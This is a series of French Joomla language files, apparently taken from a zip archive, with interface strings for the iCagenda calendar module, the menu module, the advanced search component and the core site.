MOD_POPULAR_OPTION_OFF_VALUE="Désactivé"
MOD_POPULAR_OPTION_RELATIVEDAY_VALUE="Date relative"
MOD_POPULAR_OPTION_STARTPUBLISHING_VALUE="Début de date de publication"
PK!���F9F9fr-FR/fr-FR.mod_iccalendar.ininu&1i�; iCagenda
; Copyright (c) 2012-2019 Cyril Rezé (www.icagenda.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; MODULE IC CALENDAR   : mod_iccalendar.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Libraries Error Messages
ICAGENDA_CLASS_NOT_FOUND="Classe %s non trouvée."
ICAGENDA_CAN_NOT_LOAD="iCagenda ne peut pas être chargé pour les raisons suivantes:"
IC_LIBRARY_NOT_LOADED="La librarie iC Library n'est pas correctement installée ou n'est pas chargée."
ICAGENDA_A_FOLDER_IS_MISSING="Un dossier est manquant."
ICAGENDA_IS_NOT_CORRECTLY_INSTALLED="Il semble que l'extension n'est pas installée correctement."
ICAGENDA_INSTALL_AGAIN="Merci d'installer à nouveau le composant iCagenda."
IC_ALTERNATIVELY="Sinon"
IC_PLEASE="Veuillez"
IC_LIBRARY_CHECK_PLUGIN_AND_LIBRARY="vérifier si la librairie <strong>iC Library</strong> et le plug-in système <strong>iC Library</strong> sont installés et activés."
ICAGENDA_UTILITIES_FIX_MANUAL="extraire l'archive d'installation et copier le dossier %s dans le dossier %s."
ICAGENDA_INSTALLATION_IS_BROKEN="Votre installation d'iCagenda est corrompue, veuillez ré-installer le composant."
;
IC_MODULE_CAN_NOT_BE_LOADED="Le module ne peut pas être chargé."
IC_MODULE_CHECK_ALERT_MESSAGE="Merci de lire le message d'alerte."

; Module Frontend Alert for Admin logged-in
IC_MODULE_ALERT_EVENTS_NOT_DISPLAYED="%s évènement(s) ne peuvent pas être affichés car aucun lien de menu ne le permet."

; Module iC Calendar
; General
MOD_ICCALENDAR_DESC="<span style="_QQ_"font-weight:normal"_QQ_">Module Calendrier pour le composant iCagenda<br /><br /><b>Note importante :</b> Vous devez avoir au moins 1 lien de menu vers iCagenda pour que cela fonctionne. Le module est une extension du composant, mais ne fonctionne pas si celui-ci n'est pas déclaré.<br /><br /><b>Petite astuce :</b> Si vous ne voulez pas afficher un lien vers l'agenda dans votre menu principal, vous pouvez créer un menu spécial séparé, dans une position fictive (ex : position-icagenda) et ainsi, le module renverra vers les pages de ce menu.</span>"
MOD_ICCALENDAR_COM_ICAGENDA_MENULINK_UNPUBLISHED_MESSAGE="Vous devez publier un lien de menu vers le composant iCagenda!"
MOD_ICCALENDAR_NO_EVENT="Aucun évènement dans le calendrier"

; Params
COM_MODULES_VIEW_FIELDSET_LABEL="Options iC calendar"

; Selection of the Theme Pack layout for calendar module
MOD_ICCALENDAR_THEME_PACK_LBL="Thème graphique"
MOD_ICCALENDAR_THEME_PACK_DESC="Sélectionnez le Theme Pack iCagenda à utiliser pour la mise en page du calendrier."
MOD_ICCALENDAR_HEADER_TEXT_LBL="En-tête"
MOD_ICCALENDAR_HEADER_TEXT_DESC="Entrez le texte à afficher dans la partie supérieure du module (optionnel)."

MOD_ICCALENDAR_FILTERS_LABEL="Filtres"

MOD_ICCALENDAR_LOADING_ON_DATE_LBL="Chargement à la date"
MOD_ICCALENDAR_LOADING_ON_DATE_DESC="Sélectionnez la date à laquelle le calendrier sera chargé. Si laissé vide, le calendrier sera chargé sur le mois et l'année en cours. Cette option n'a pas d'effet sur l'affichage des dates, mais vous permet de changer le mois et l'année par défaut lors de la première visite ou rafraîchissement de la page."

MOD_ICCALENDAR_LBL_TOOLTIP="Options de l'info-bulle"
MOD_ICCALENDAR_LBL_TIP_WIDTH="Largeur info-bulle"
MOD_ICCALENDAR_DESC_TIP_WIDTH="Entrez la largeur requise de l'info-bulle en pixels"
MOD_ICCALENDAR_LBL_FULL_WIDTH_THRESHOLD="Valeur de bascule Plein écran"
MOD_ICCALENDAR_DESC_FULL_WIDTH_THRESHOLD="Entrez la valeur de bascule correspondant à la largeur maximum de l'écran d'un téléphone mobile. Si la fenêtre est plus étroite que la valeur définie ici, l'info-bulle s'adaptera à la taille de l'écran. Pour ignorer cette fonctionnalité, définir la valeur à zéro"
MOD_ICCALENDAR_LBL_HORIZ_POSITION="Positionnement horizontal de l'info-bulle"
MOD_ICCALENDAR_DESC_HORIZ_POSITION="Sélectionner <b>Gauche</b> pour afficher l'info-bulle à la gauche du module, <b>right</b> pour afficher l'info-bulle à la droite du module, ou sélectionner <b>Centrer sur la page</b> pour centrer l'info-bulle horizontalement au milieu de la page."
MOD_ICCALENDAR_HORIZ_POSITION_LEFT="Gauche"
MOD_ICCALENDAR_HORIZ_POSITION_RIGHT="Droite"
MOD_ICCALENDAR_HORIZ_POSITION_MIDDLE="Centrée sur la page"
MOD_ICCALENDAR_LBL_VERT_POSITION="Positionnement vertical de l'info-bulle"
MOD_ICCALENDAR_DESC_VERT_POSITION="Indiquez si vous souhaitez aligner l'info-bulle avec le haut ou le bas du module"
MOD_ICCALENDAR_VERT_POSITION_TOP="Haut"
MOD_ICCALENDAR_VERT_POSITION_BOTTOM="Bas"
MOD_ICCALENDAR_LBL_VERT_POSITION_OFFSET="Décalage vertical"
MOD_ICCALENDAR_DESC_VERT_POSITION_OFFSET="L'info-bulle sera alignée vers le haut ou le bas du module calendrier. La valeur de décalage vertical permet d'ajuster en pixels, le positionnement vers le haut ou vers le bas. Saisir un nombre positif pour déplacer la bulle vers le haut de l'écran et un nombre négatif pour un déplacement vers le bas."
MOD_ICCALENDAR_LBL_MOUSEOVER="Ouverture de l'info-bulle"
MOD_ICCALENDAR_DESC_MOUSEOVER="Mode d'ouverture de l'info-bulle : au clic ou au passage de la souris"
MOD_ICCALANDAR_OPEN_CLICK="Clic"
MOD_ICCALANDAR_OPEN_MOUSEOVER="Au passage de la souris"
MOD_ICCALENDAR_CLOSE_ON_MOUSEOUT_LBL="Fermeture info-bulle si curseur en dehors"
MOD_ICCALENDAR_CLOSE_ON_MOUSEOUT_DESC="L'info-bulle peut être fermée automatiquement si le curseur sort de l'info-bulle, en complément du bouton de fermeture."
MOD_ICCALENDAR_LBL_FORMAT="Format de la Date"
MOD_ICCALENDAR_FORMAT_NOTE="Format d'affichage de la date, dans l'info-bulle"
MOD_ICCALENDAR_DESC_FORMAT="Format d'affichage de la date, dans l'info-bulle"

COM_ICAGENDA_LBL_CLOSE_TEXT="Bouton Fermer"
COM_ICAGENDA_DESC_CLOSE_TEXT="Si défini 'par défaut', le texte 'Fermer' sera affiché, traduit dans la langue courante du site (si la traduction est à jour dans votre pack de langue iCagenda). Vous pouvez utiliser une valeur personnalisée pour afficher un autre texte ou symbole."

MOD_ICCALENDAR_LBL_DISPLAY="Affichage"

MOD_ICCALENDAR_LBL_TOOLTIP_INFOS="Informations de l'info-bulle"

MOD_ICCALENDAR_DISPLAY_REGISTRATION_INFOS_LABEL="Infos inscriptions"
MOD_ICCALENDAR_DISPLAY_REGISTRATION_INFOS_DESC="Afficher le nombre de places, places disponibles et déjà réservées, si définis pour chaque évènement"

MOD_ICCALENDAR_DISPLAY_TIME_LABEL="Horaire"
MOD_ICCALENDAR_DISPLAY_TIME_DESC="Afficher l'horaire, si défini, pour chaque évènement"

MOD_ICCALENDAR_DISPLAY_CITY_LABEL="Ville"
MOD_ICCALENDAR_DISPLAY_CITY_DESC="Afficher la ville, si définie, pour chaque évènement"

MOD_ICCALENDAR_DISPLAY_COUNTRY_LABEL="Pays"
MOD_ICCALENDAR_DISPLAY_COUNTRY_DESC="Afficher le pays, si défini, pour chaque évènement"

MOD_ICCALENDAR_DISPLAY_VENUE_NAME_LABEL="Lieu"
MOD_ICCALENDAR_DISPLAY_VENUE_NAME_DESC="Afficher/Masquer le nom du lieu, si défini, pour chaque évènement"

MOD_ICCALENDAR_FEATURES_ICONSIZE_LABEL="Taille Icônes Caractéristiques"
MOD_ICCALENDAR_FEATURES_ICONSIZE_DESC="Sélectionner la taille des Icônes à afficher dans l'info-bulle."
MOD_ICCALENDAR_SHOW_FEATURE_ICON_TITLE_LABEL="Afficher le titre des icônes?"
MOD_ICCALENDAR_SHOW_FEATURE_ICON_TITLE_DESC="Sélectionner si la valeur saisie pour l'attribut ALT de l'image de l'icône sera également utilisé comme attribut TITLE (pour fournir une valeur à l'info-bulle au passage de la souris)."

MOD_ICCALENDAR_NAVIGATION="Navigation"
MOD_ICCALENDAR_NAVIGATION_MONTH_DISPLAY_LBL="Navigation Mois"
MOD_ICCALENDAR_NAVIGATION_MONTH_DISPLAY_DESC="Afficher/Masquer la navigation par mois"
MOD_ICCALENDAR_NAVIGATION_YEAR_DISPLAY_LBL="Navigation Année"
MOD_ICCALENDAR_NAVIGATION_YEAR_DISPLAY_DESC="Afficher/Masquer la navigation par année"

MOD_ICCALENDAR_LBL_FIRSTDAY_WEEK="Premier jour de la semaine"
MOD_ICCALENDAR_LBL_FIRSTDAY="Premier jour"
MOD_ICCALENDAR_LBL_PERIOD="Évènement sur une période"
MOD_ICCALENDAR_PERIOD_ONLY_START_DATE_LBL="Affichage"
MOD_ICCALENDAR_PERIOD_ONLY_START_DATE_DESC="Sélectionnez cette option pour afficher uniquement la date de début d'un évènement sur ​​une période dans le calendrier, ou bien toutes les dates."
PERIOD_ALL_DATES="Toutes les dates"
PERIOD_ONLY_START_DATE="Uniquement la date de début"

MOD_ICCALENDAR_LBL_FONTCOLORS="Couleur des polices"
MOD_ICCALENDAR_CALENDAR_FONTCOLOR_LBL="Couleur de police par défaut"
MOD_ICCALENDAR_CALENDAR_FONTCOLOR_DESC="Couleur par défaut utilisée pour la police du calendrier. Si laissé vide, utilisera les déclarations de style du fichier css de votre template de site."

MOD_ICCALENDAR_LBL_BGCOLORS="Couleurs de fond"
MOD_ICCALENDAR_DAY_WITH_ONE_EVENT_BACKGROUND_COLOR_LBL="Un seul évènement"
MOD_ICCALENDAR_DAY_WITH_ONE_EVENT_BACKGROUND_COLOR_DESC="Couleur à utiliser comme couleur de fond du jour si un seul évènement. Si laissé vide, utilise la couleur de la catégorie comme couleur de fond."
MOD_ICCALENDAR_DAY_WITH_EVENTS_BACKGROUND_COLOR_LBL="Plusieurs évènements"
MOD_ICCALENDAR_DAY_WITH_EVENTS_BACKGROUND_COLOR_DESC="Couleur à utiliser comme couleur de fond du jour si plusieurs évènements le même jour. Si laissé vide, utilise la couleur d'une catégorie comme couleur de fond."
ICCALENDAR_BACKGROUND_COLOR="Couleur de fond"
ICCALENDAR_BACKGROUND_COLOR_DESC="Couleur de fond du calendrier"
ICCALENDAR_BACKGROUND_IMAGE="Image de fond"
ICCALENDAR_BACKGROUND_IMAGE_DESC="Image de fond du calendrier"
ICCALENDAR_BACKGROUND_IMAGE_REPEAT="Répétition du fond"
ICCALENDAR_BACKGROUND_IMAGE_REPEAT_DESC="Répétition de l'image de fond"

COM_MODULES_FILTER_FIELDSET_LABEL="Filtres"
COM_ICAGENDA_ALL="Tous"
COM_ICAGENDA_ALL_F="Toutes"
MOD_ICCALENDAR_LBL_CATEGORY="Catégorie"
MOD_ICCALENDAR_DESC_CATEGORY="Filtre par catégorie. Sous Joomla 2.5, vous pouvez utiliser Ctrl+clic (Windows) ou Cmd+clic (Mac) pour sélectionner plusieurs éléments. Sous Joomla 3, si ce champ est laissé vide, toutes les catégories seront affichées."

; Advanced Options
MOD_ICCALENDAR_LBL_ADVANCED="Options avancées"

MOD_ICCALENDAR_LBL_JQUERY="Librairie jQuery"
MOD_ICCALENDAR_LBL_LOADJQUERY="Charger JQuery"
MOD_ICCALENDAR_DESC_LOADJQUERY="Prévenir les conflits js. Chargement de la librairie jQuery (api Google) du module iCcalendar.<br>Peut aider à résoudre certains conflit jQuery.<br><br>Nous vous conseillons d'installer l'excellent plugin <b>jQuery Easy</b>, si vous rencontrez un conflit de librairie."
MOD_ICCALENDAR_LOADJQUERY_AUTO="Auto"
MOD_ICCALENDAR_LOADJQUERY_YES="Oui"
MOD_ICCALENDAR_LOADJQUERY_NO="Non"

ICAGENDA_LBL_JQUERY="Librairie jQuery"

ICAGENDA_LBL_TIMEZONE="Paramètres Fuseau Horaire"
ICAGENDA_LBL_TODAY_TIMEZONE="Fuseau Horaire - aujourd'hui"
ICAGENDA_DESC_TODAY_TIMEZONE="Fuseau horaire à utiliser pour mettre en évidence 'Aujourd'hui'"
ICAGENDA_JOOMLA_SERVER_TIMEZONE="Joomla - Fuseau Horaire"
ICAGENDA_UTC_TIMEZONE="Fuseau Horaire - UTC"
ICAGENDA_HOSTING_SERVER_TIMEZONE="Hébergement - Fuseau Horaire Serveur"
ICAGENDA_VISITOR_TIMEZONE="Fuseau Horaire Visiteur"

; Alert message if tag 'cal_date' is missing in THEME_day.php (usage of defined strings in com_icagenda admin .ini file)
MOD_ICCALENDAR_ALERT_CAL_DATE_MISSING_DESC="Pour utiliser l'option 'Fuseau horaire du visiteur' avec les Thème Packs listés ci-dessous, il est nécessaire de les mettre à jour."

MOD_ICCALENDAR_CACHE_NOTE="Note: <br/><br/>Le module iC calendar ne permet pas le changement de mois si le cache de Joomla est activé sur <i>Progressif</i>. Si Cache activé sur <i>Conservateur</i> ou désactivé, le changement de mois se fait sans actualisation de la page."

; Not in Use
MOD_ICCALENDAR_LBL_TEMPLATE="Thème graphique"
MOD_ICCALENDAR_DESC_TEMPLATE="Choisissez le thème graphique à appliquer au module"

; Front-End
MOD_ICCALENDAR_EVENT_DATE="Date : "
MOD_ICCALENDAR_NO_IMAGE="Aucune image"
MOD_ICCALENDAR_LOADING="chargement..."
MOD_ICCALENDAR_CLOSE="Fermer"

MOD_ICCALENDAR_SEATS_NUMBER="Nombre de places"
MOD_ICCALENDAR_SEATS_AVAILABLE="Places disponibles"
MOD_ICCALENDAR_ALREADY_BOOKED="Places déjà réservées"
MOD_ICCALENDAR_ALREADY_REGISTERED="Places déjà enregistrées"
MOD_ICCALENDAR_REGISTRATION_DATE_NO_TICKETS_LEFT="Plus aucune place disponible pour cette date"
MOD_ICCALENDAR_REGISTRATION_CLOSED="Inscriptions closes"


; Months Calendar
JANUARY_CAL="Janvier"
FEBRUARY_CAL="Février"
MARCH_CAL="Mars"
APRIL_CAL="Avril"
MAY_CAL="Mai"
JUNE_CAL="Juin"
JULY_CAL="Juillet"
AUGUST_CAL="Août"
SEPTEMBER_CAL="Septembre"
OCTOBER_CAL="Octobre"
NOVEMBER_CAL="Novembre"
DECEMBER_CAL="Décembre"

; Titles navigation arrows
MOD_ICCALENDAR_PREVIOUS_YEAR="Année précédente"
MOD_ICCALENDAR_PREVIOUS_MONTH="Mois précédent"
MOD_ICCALENDAR_NEXT_MONTH="Mois suivant"
MOD_ICCALENDAR_NEXT_YEAR="Année suivante"

; Prefix, Suffix and separator Calendar
; Add a prefix for month in calendar if needed in your language. If no prefix for month in your culture, copy/paste en-GB string.
PREFIX_MONTH="CALENDAR_PREFIX_MONTH_FACULTATIVE"
; Add a suffix for month in calendar if needed in your language. If no suffix for month in your culture, copy/paste en-GB string.
SUFFIX_MONTH="CALENDAR_SUFFIX_MONTH_FACULTATIVE"
; Add a prefix for year in calendar if needed in your language. If no prefix for year in your culture, copy/paste en-GB string.
PREFIX_YEAR="CALENDAR_PREFIX_YEAR_FACULTATIVE"
; Add a suffix for year in calendar if needed in your language. If no suffix for year in your culture, copy/paste en-GB string.
SUFFIX_YEAR="CALENDAR_SUFFIX_YEAR_FACULTATIVE"
; Add a separator for month and year. If a separator is not needed, leave this string empty. If only a space needed, copy/paste en-GB string.
SEPARATOR_MONTH_YEAR="CALENDAR_SEPARATOR_MONTH_YEAR_FACULTATIVE"

MOD_ICCALENDAR_TIP_PADDING="Les marges intérieures s'appliquent uniquement si la largeur de l'écran détectée indique que l'utilisateur visite le site via un téléphone mobile. Il peut être utilisé pour créer une marge entre le contenu et le bord supérieur et/ou inférieur de l'info-bulle pour éviter les conflits avec d'autres éléments visibles."
MOD_ICCALENDAR_LBL_TIP_PADDING="Marges intérieures de l'info-bulle"
MOD_ICCALENDAR_DESC_TIP_PADDING="Entrez les valeurs au format css pour les marges intérieures (ex: '0 0 50px 0' pour augmenter la distance du contenu de 50 pixels à partir du bas de l'écran)."

; Deprecated 3.6.4
MOD_ICCALENDAR_FIELD_MENU_LABEL="Lien de menu"
MOD_ICCALENDAR_FIELD_MENU_DESC="Lier à un lien de menu spécifique, de type 'iCagenda - Liste des évènements', afin d'utiliser ses options prédéfinies"
PK!�E��
�
fr-FR/fr-FR.mod_menu.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_MENU="Menu"
MOD_MENU_FIELD_ACTIVE_DESC="Sélectionnez un lien de menu devant toujours être affiché et servant de base pour l'affichage du menu.<br />Vous devez spécifier un niveau de départ identique ou plus élevé que le niveau de l'élément de base. Cela entraînera l'affichage du module sur toutes les pages assignées.<br />Si le lien de menu courant est sélectionné, le lien de menu actif est utilisé comme base."
MOD_MENU_FIELD_ACTIVE_LABEL="Lien de base"
MOD_MENU_FIELD_ALLCHILDREN_DESC="Activer/Désactiver l'affichage 'déroulé' de tous les liens des sous-menus."
MOD_MENU_FIELD_ALLCHILDREN_LABEL="Afficher tous les liens"
MOD_MENU_FIELD_CLASS_DESC="Vous pouvez spécifier un suffixe à ajouter à la classe CSS des liens du menu pour utiliser un style spécifique.<br />La classe CSS avec le suffixe doit être présente dans la feuille de style CSS du template."
MOD_MENU_FIELD_CLASS_LABEL="Suffixe CSS de menu"
MOD_MENU_FIELD_ENDLEVEL_DESC="Sélectionnez le dernier niveau de sous-menu à afficher. Si vous sélectionnez 'Tous', tous les niveaux seront visibles. Si vous sélectionnez la même valeur que celle de départ, un seul niveau sera affiché."
MOD_MENU_FIELD_ENDLEVEL_LABEL="Dernier niveau"
MOD_MENU_FIELD_MENUTYPE_DESC="Sélectionnez dans la liste déroulante le menu à afficher."
MOD_MENU_FIELD_MENUTYPE_LABEL="Menu à afficher"
MOD_MENU_FIELD_STARTLEVEL_DESC="Spécifiez par une valeur numérique le premier niveau de menu (ou sous-menu) à partir duquel les liens doivent être affichés. Par exemple, pour simplifier la navigation, vous pouvez afficher une copie du menu principal dans les pages des liens enfants en masquant le premier niveau."
MOD_MENU_FIELD_STARTLEVEL_LABEL="Niveau de départ"
MOD_MENU_FIELD_TAG_ID_DESC="Vous pouvez spécifier une valeur numérique pour attribuer un identifiant unique à la balise primaire du menu (ul). Ceci est nécessaire si vous utilisez les mêmes noms pour des liens de différents menus."
MOD_MENU_FIELD_TAG_ID_LABEL="ID de menu"
MOD_MENU_FIELD_TARGET_DESC="Vous pouvez spécifier les valeurs de positionnement des fenêtres popup appelées par les liens de menu. Exemple&#160: top=50, left=50, width=200, height=300"
MOD_MENU_FIELD_TARGET_LABEL="Position de la popup"
MOD_MENU_XML_DESCRIPTION="Le module 'mod_menu' affiche les liens d'un menu spécifié selon les paramètres choisis."
PK!w��eefr-FR/fr-FR.com_finder.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_FINDER="Recherche avancée"
COM_FINDER_ADVANCED_SEARCH_TOGGLE="Recherche avancée"
COM_FINDER_ADVANCED_TIPS="Voici quelques exemples de la façon d'utiliser la fonction de recherche avancée:<br />Saisir <em>ceci et cela</em> renvoie des résultats contenant ces deux mots.<br />Saisir <em>ceci pas cela</em> renvoie des résultats contenant le mot 'ceci' mais pas 'cela'.<br />Saisir <em>ceci ou cela</em> renvoie des résultats contenant l'un de ces deux mots.<br />Saisir <em>\"ceci et cela\"</em> entre guillemets renvoie des résultats contenant cette phrase exacte.<br />Les résultats de la recherche peuvent être affinés en utilisant une variété de critères, dont la sélection d'un ou plusieurs filtres ci-dessous."
COM_FINDER_DEFAULT_PAGE_TITLE="Résultats de recherche"
COM_FINDER_FILTER_BRANCH_LABEL="Recherche par %s"
COM_FINDER_FILTER_DATE_BEFORE="Avant"
COM_FINDER_FILTER_DATE_EXACTLY="Exactement"
COM_FINDER_FILTER_DATE_AFTER="Après"
COM_FINDER_FILTER_DATE1="Date de départ"
COM_FINDER_FILTER_DATE1_DESC="Indiquez la date en format YYYY-MM-DD"
COM_FINDER_FILTER_DATE2="Date de fin"
COM_FINDER_FILTER_DATE2_DESC="Indiquez la date en format YYYY-MM-DD"
COM_FINDER_FILTER_SELECT_ALL_LABEL="Rechercher tout"
COM_FINDER_FILTER_WHEN_AFTER="Après"
COM_FINDER_FILTER_WHEN_BEFORE="Avant"
COM_FINDER_QUERY_DATE_CONDITION_AFTER="après"
COM_FINDER_QUERY_DATE_CONDITION_BEFORE="avant"
COM_FINDER_QUERY_DATE_CONDITION_EXACT="exactement sur"
COM_FINDER_QUERY_END_DATE="Date de fin <span class='when'>%s</span> <span class='date'>%s</span>"
COM_FINDER_QUERY_OPERATOR_AND="et"
COM_FINDER_QUERY_OPERATOR_OR="ou"
COM_FINDER_QUERY_OPERATOR_NOT="pas"
COM_FINDER_QUERY_FILTER_BRANCH_VENUE="lieu de réunion"
COM_FINDER_QUERY_START_DATE="date de départ <span class='when'>%s</span> <span class='date'>%s</span>"
COM_FINDER_QUERY_TAXONOMY_NODE="avec <span class='node'>%s</span> comme <span class='branch'>%s</span> "
COM_FINDER_QUERY_TOKEN_EXCLUDED="<span class='term'>%s</span> doit être exclu"
COM_FINDER_QUERY_TOKEN_GLUE=", et "
COM_FINDER_QUERY_TOKEN_INTERPRETED="Recherche effectuée : %s, les résultats suivants ont été trouvés."
COM_FINDER_QUERY_TOKEN_OPTIONAL="<span class='term'>%s</span> est optionnel"
COM_FINDER_QUERY_TOKEN_REQUIRED="<span class='term'>%s</span> est requis"
COM_FINDER_SEARCH_NO_RESULTS_BODY="Aucun résultat n'a pu être trouvé avec la requête: %s."
COM_FINDER_SEARCH_NO_RESULTS_BODY_MULTILANG="Aucun résultat n'a pu être trouvé en français (fr-FR) pour la recherche suivante: %s"
COM_FINDER_SEARCH_NO_RESULTS_HEADING="Aucun résultat trouvé"
COM_FINDER_SEARCH_RESULTS_OF="Résultats <strong>%s</strong> - <strong>%s</strong> de <strong>%s</strong>"
COM_FINDER_SEARCH_SIMILAR="Vouliez-vous rechercher: %s?"
COM_FINDER_SEARCH_TERMS="Termes de recherche:"
PK!�m�QQfr-FR/fr-FR.ininu&1i�; @date        2014-09-17
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.

; Keep this string on top
JERROR_PARSING_LANGUAGE_FILE="&#160;: erreur(s) ligne(s) %s"

ERROR="Erreur"
INFO="Info"
MESSAGE="Message"
NOTICE="Annonce"
WARNING="Avertissement"

J1="1"
J2="2"
J3="3"
J4="4"
J5="5"
J6="6"
J7="7"
J8="8"
J9="9"
J10="10"
J15="15"
J20="20"
J25="25"
J30="30"
J50="50"
J100="100"
J200="200"
J500="500"

JACTION_ADMIN="Configurer"
JACTION_ADMIN_GLOBAL="Super Administrateur"
JACTION_COMPONENT_SETTINGS="Paramétrage des composants"
JACTION_CREATE="Créer"
JACTION_DELETE="Supprimer"
JACTION_EDIT="Modifier"
JACTION_EDITOWN="Modifier soi-même"
JACTION_EDITSTATE="État de modification"
JACTION_LOGIN_ADMIN="Connexion à l'Administration"
JACTION_LOGIN_SITE="Connexion au Site"
JACTION_MANAGE="Accès à l'interface d'administration"

JADMINISTRATOR="Administrateur"
JALL="Tout"
JALL_LANGUAGE="Toutes"
JAPPLY="Sauvegarder"
JARCHIVED="Archivé"
JASSOCIATIONS="Également disponible :"
JASSOCIATIONS_ASC="Associations ascendant"
JASSOCIATIONS_DESC="Associations descendant"
JAUTHOR="Auteur"
JAUTHOR_ASC="Auteur ascendant"
JAUTHOR_DESC="Auteur descendant"
JCANCEL="Annuler"
JCATEGORY="Catégorie"
JCATEGORY_ASC="Catégorie ascendant"
JCATEGORY_DESC="Catégorie descendant"
JCLEAR="Effacer"
JDATE="Date"
JDATE_ASC="Date ascendant"
JDATE_DESC="Date descendant"
JDAY="Jour"
JDEFAULT="Défaut"
JDETAILS="Détails"
JDISABLED="Désactivé"
JEDITOR="Éditeur"
JENABLED="Activé"
JEXPIRED="Expiré"
JFALSE="Faux"
JFEATURED="En vedette"
JFEATURED_ASC="En vedette ascendant"
JFEATURED_DESC="En vedette descendant"
JHIDE="Masquer"
JINVALID_TOKEN="La dernière requête a été refusée car elle contenait un marqueur de sécurité invalide. Rafraîchissez la page et réessayez."
JINVALID_TOKEN_NOTICE="L'identifiant de sécurité ne correspondait pas. La demande a été interrompue pour empêcher toute violation de la sécurité. Veuillez réessayer."
JLOGIN="Connexion"
JLOGOUT="Déconnexion"
JMONTH="Mois"
JNEW="Nouveau/nouvelle"
JNEXT="Suivant"
JNEXT_TITLE="Article suivant&nbsp;: %s"
JNO="Non"
JNONE="Aucun"
JNOTPUBLISHEDYET="Pas encore publié"
JNOTICE="Annonce"
JOFF="Désactivé"
JOFFLINE_MESSAGE="Ce site est en maintenance.<br /> Merci de revenir ultérieurement."
JON="Activé"
JOPTIONS="Options"
JPAGETITLE="%1$s - %2$s"
JPREV="Précédent"
JPREVIOUS="Précédent"
JPREVIOUS_TITLE="Article précédent&nbsp;: %s"
JPUBLISHED="Publié"
JREGISTER="S'inscrire"
JREQUIRED="Requis"
JSAVE="Sauvegarder"
JSELECT="Sélectionner"
JSHOW="Afficher"
JSITE="Site"
JSTATUS="Statut"
JSTATUS_ASC="Statut ascendant"
JSTATUS_DESC="Statut descendant"
JSUBMIT="Envoyer"
JTAG="Tags"
JTAG_DESC="Ajouter ou supprimer des tags à cet élément. Il est possible de créer un nouveau tag en entrant le nom dans le champ puis en pressant la touche Enter."
JTAG_FIELD_SELECT_DESC="Sélectionner le tag à utiliser"
JTOOLBAR="Barre d'outils"
JTOOLBAR_VERSIONS="Versions"
JTRASH="Corbeille"
JTRASHED="Mis à la corbeille"
JTRUE="Vrai"
JUNPUBLISHED="Dépublié"
JUSER_TOOLS="Outils utilisateur"
JYEAR="Année"
JYES="Oui"

JBROWSERTARGET_MODAL="Modal"
JBROWSERTARGET_NEW="Ouvrir dans une nouvelle fenêtre"
JBROWSERTARGET_PARENT="Ouvrir dans la fenêtre parente"
JBROWSERTARGET_POPUP="Ouvrir en pop-up"

JERROR_ALERTNOAUTHOR="Vous n'êtes pas autorisé à accéder à cette ressource."
JERROR_ALERTNOTEMPLATE="<strong>Le template nécessaire à cet affichage est indisponible. Veuillez contacter un administrateur du site.</strong>"
JERROR_AN_ERROR_HAS_OCCURRED="Une erreur est survenue"
JERROR_COULD_NOT_FIND_TEMPLATE="Impossible de trouver le template \"%s\"."
JERROR_ERROR="Erreur"
JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE="<strong>bookmark/favori périmé</strong>"
JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST="Une erreur est survenue pendant l'exécution de la requête."
JERROR_LAYOUT_GO_TO_THE_HOME_PAGE="Aller à la page d'accueil"
JERROR_LAYOUT_HOME_PAGE="Page d'accueil"
JERROR_LAYOUT_MIS_TYPED_ADDRESS="une adresse <strong>erronée</strong>"
JERROR_LAYOUT_NOT_ABLE_TO_VISIT="Vous ne pouvez pas visiter cette page car :"
JERROR_LAYOUT_PAGE_NOT_FOUND="La page recherchée ne peut être affichée."
JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR="Si les difficultés persistent, merci de contacter l'administrateur de ce site."
JERROR_LAYOUT_PLEASE_TRY_ONE_OF_THE_FOLLOWING_PAGES="Veuillez essayer l'une des pages suivantes :"
JERROR_LAYOUT_PREVIOUS_ERROR="Erreur précédente"
JERROR_LAYOUT_REQUESTED_RESOURCE_WAS_NOT_FOUND="La ressource demandée <strong>n'a pas été trouvée</strong>"
JERROR_LAYOUT_SEARCH="Effectuez une recherche sur le site ou allez sur la page d'accueil."
JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING="Un moteur de recherche possède un listing <strong>périmé</strong> pour ce site"
JERROR_LAYOUT_SEARCH_PAGE="Chercher dans le site"
JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE="vous <strong>n'avez pas</strong> accès à cette page"
JERROR_LOADING_MENUS="Erreur de chargement des menus : %s"
JERROR_LOGIN_DENIED="Vous ne pouvez pas accéder à la section privée de ce site."
JERROR_NOLOGIN_BLOCKED="Connexion refusée! Soit votre compte est bloqué, soit vous ne l'avez pas encore activé."
JERROR_PAGE_NOT_FOUND="Page non trouvée"
JERROR_SENDING_EMAIL="L'e-mail ne peut pas être envoyé."
JERROR_SESSION_STARTUP="Erreur lors de l'initialisation de la session."
JERROR_TABLE_BIND_FAILED="hmm %s ..."
JERROR_USERS_PROFILE_NOT_FOUND="Profil utilisateur non trouvé"

JFIELD_ACCESS_DESC="Niveau d'accès pour ce contenu"
JFIELD_ACCESS_LABEL="Accès"
